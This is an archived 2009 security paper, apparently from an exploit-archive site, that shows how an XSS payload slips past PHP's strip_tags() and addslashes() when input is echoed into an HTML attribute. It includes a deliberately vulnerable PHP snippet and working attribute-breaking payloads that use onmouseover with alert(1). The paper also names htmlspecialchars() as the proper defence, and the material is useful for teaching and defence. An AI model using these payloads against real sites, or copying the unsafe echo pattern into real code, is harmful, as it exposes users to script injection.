XSS Workaround For strip_tags And addslashes

XSS Workaround For strip_tags And addslashes: Posted Aug 26, 2009; Authored by Inj3ct0r | Site Inj3ct0r.com; This paper documents a cross site scripting workaround for strip_tags and addslashes.; tags | paper, xss; SHA-256 | 7aa842a76e4ec47865c611db68a692cad7db17b86333f2d6fba41e17ca13aff2; Download | Favorite | View

XSS Workaround For strip_tags And addslashes

=====================================================
Workaround strip_tags () and addslashes () in the XSS
=====================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com
  
So, imagine such a simple script:


PHP code:

<?php 
$xss=''; 
$xss=trim(strip_tags(addslashes($xss))); 
print '<input name="123" value="'.$xss.'"/>'; 
?>

  
Now the standard test methods:

PHP code:

 //1 
$xss='" onmouseover=alert(1) a="'; 
//2 
$xss='"><script>alert(1)</script><'; 

  
In the first case, we removed XSS function addslashes (),
in the second - a function strip_tags. XSS is not gone = (


Now, our variable set equal to the following value:

PHP code:

$xss='" style="a:b;margin-top:-1000px;margin-left:-100px;width:4000px;height:4000px;display:block;" onmouseover=alert(1); a="';


Get this html code:

<input name="123" value="\" style=\"a:b;margin-top:-1000px;margin-left:-100px;width:4000px;height:4000px;display:block;\" onmouseover=alert(1); a=\""/> 


Alert! =))
  
Usually applies htmlspecialchars () / htmlentities (), and this is the surest way to protect against XSS.

Now we are not an obstacle as strip_tags, and addslashes =)

As you can see, there is closure of the first attribute, then a big block of CSS and the implementation of javascript onmouseover =)

Tested on IE8, Firefox 3, Opera 9.51, and Safari 3

ThE End =]  Visit my proj3ct  :

http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net

# ~  - [ [ : Inj3ct0r : ] ]

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

XSS Workaround For strip_tags And addslashes

XSS Workaround For strip_tags And addslashes

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

XSS Workaround For strip_tags And addslashes

Share This

XSS Workaround For strip_tags And addslashes

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems